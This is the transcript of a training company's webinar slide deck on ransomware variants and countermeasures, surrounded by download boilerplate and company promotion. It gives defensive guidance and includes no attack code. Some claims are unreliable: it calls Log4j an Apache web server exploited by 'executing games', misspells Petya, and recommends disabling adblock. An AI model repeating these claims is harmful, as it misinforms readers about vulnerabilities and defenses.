1 / 16

Ransomware- A Reality Check (Part 2)

Ransomware has been the most significant threat for years which has been affected over sectors and remained one of the top risks. The topics covered in the webinar are detailed in this blog for reference.

Download Presentation

Ransomware- A Reality Check (Part 2)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Ransomware- A Reality Check (Part 2) www.infosectrain.com | sales@infosectrain.com

  2. www.infosectrain.com | sales@infosectrain.com

  3. Ransomware- A reality check (Part 1) • Ransomware- A reality check (Part 2) • Ransomware- A reality check (Part 3) www.infosectrain.com | sales@infosectrain.com

  4. Variants of Ransomware Bad Rabbit: It was distributed by a fake Adobe Flash update on a corrupt website. Fake Adobe Flash update; once it is downloaded, your data has been compromised. Crypto wall: Malware hides in your zip files and other email attachments, and then it makes its way to your devices. Once you install them, it tries to find java vulnerabilities to encrypt or withhold your data. Patia: It is a crypto-ransomware that targets your Windows servers, laptops, or PC and mostly takes advantage of SMB (Server Message Block) and tries to steal your credentials and spread them into your machine. Wanna cry: It was first seen in a large-scale crypto-ransomware attack in 2017. It affected almost a quarter-million machines internationally, and it spreads through your windows operating system. Black Byte: It is a notorious variant that compromised multiple US and foreign businesses, including three critical US infrastructure sectors. It encrypts your files and compromises the Windows host system, including physical and virtual servers. www.infosectrain.com | sales@infosectrain.com

  5. Countermeasures The following are the countermeasures or defense mechanisms to be implemented to ensure safe data transfer: www.infosectrain.com | sales@infosectrain.com

  6. Using Firewall to its fullest capability Firewalls are the most reliable. If a firewall does not allow a malicious web request or an email security gateway has been implemented, then the users will not get any malicious attacks or emails. But if the firewall fails, there should be backup plans. Log4j attack: Log4j vulnerability, an Apache web server, has been exploited in the wild by executing games and transforming from exploiting the game servers to the actual corporate servers. User Education For example, if an email passes through an email security gateway and firewall, and if the user is unaware of potential phishing emails, it develops the attack surface. Kevin Mitnick, the most notorious hacker, started phishing the telephone, and the FBI searched for him a lot. There is training from this company called KnowBe4 that makes the user aware of phishing and how to identify emails received from an unsuspected user. www.infosectrain.com | sales@infosectrain.com

  7. Disabling Macros execution Now the execution of macros is the popular one where people get exploited. For example, a malicious document is attached to a mail received by the user unaware of it and thinks it is legitimate. He then opens the documents, and therefore the macros get enabled in the organization if he uses the organization network. Macros are small code blocks that get executed automatically in the background, primarily when an office application is based on a visual basis. These codes are written to exploit any existing vulnerabilities in the computers. www.infosectrain.com | sales@infosectrain.com

  8. Implement Web security The Cross-site scripting attack- suppose your browser is vulnerable to any particular attack. These types of vulnerabilities of the browsers are exploited by visiting any malicious website. There’s a well-known chef Jamie Oliver, whose website was vulnerable. As everyone visiting his website had downloaded the malicious code in the background. To overcome such malicious code, every organization should implement WAF rules and disable adblock. www.infosectrain.com | sales@infosectrain.com

  9. Incorporate least privilege policy Rule-based access control and our backup is most important. The privileged access to people only to perform the activity, not the full access, is part of a defense-in-depth strategy. Network Segmentation The HR Department is the one who receives more external emails document or PDF files when compared to the software development department. Do you think both guys should work on the same network to implement high security?. If HR receives a malicious email and clicks, the malware starts spreading in the environment. For example, Wipro was part of the MSSP attack. A supply chain attack has been infected because some other team had clicked some URL that led people to come into the network. If they had segmented their network, they would have prevented it. www.infosectrain.com | sales@infosectrain.com

  10. Active monitoring Security Analyst Security Operation Center (SOC) monitors 24/7 alerts. They look to modify and identify the attacks. For example, when they figured out that log4j was being exploited by 3000 times of log4j attempts, they implemented alerts and security measures to block the attempt and notify us. That helps to take further steps and investigate that particular source or IP address. Action Plan It’s not about how you will be attacked; it’s about when you will be attacked. Even organizations with high security are compromised, and an Action plan helps in this case. A clear and detailed action plan of what to do and how to do it when an attack occurs includes the most practical and effective countermeasure to implement quickly. www.infosectrain.com | sales@infosectrain.com

  11. About InfosecTrain • Established in 2016, we are one of the finest Security and Technology Training and Consulting company • Wide range of professional training programs, certifications & consulting services in the IT and Cyber Security domain • High-quality technical services, certifications or customized training programs curated with professionals of over 15 years of combined experience in the domain www.infosectrain.com | sales@infosectrain.com

  12. Our Endorsements www.infosectrain.com | sales@infosectrain.com

  13. Why InfosecTrain Global Learning Partners Access to the recorded sessions Certified and Experienced Instructors Flexible modes of Training Post training completion Tailor Made Training www.infosectrain.com | sales@infosectrain.com

  14. Our Trusted Clients www.infosectrain.com | sales@infosectrain.com

  15. Contact us Get your workforce reskilled by our certified and experienced instructors! IND: 1800-843-7890 (Toll Free) / US: +1 657-221-1127 / UK : +44 7451 208413 sales@infosectrain.com www.infosectrain.com

More Related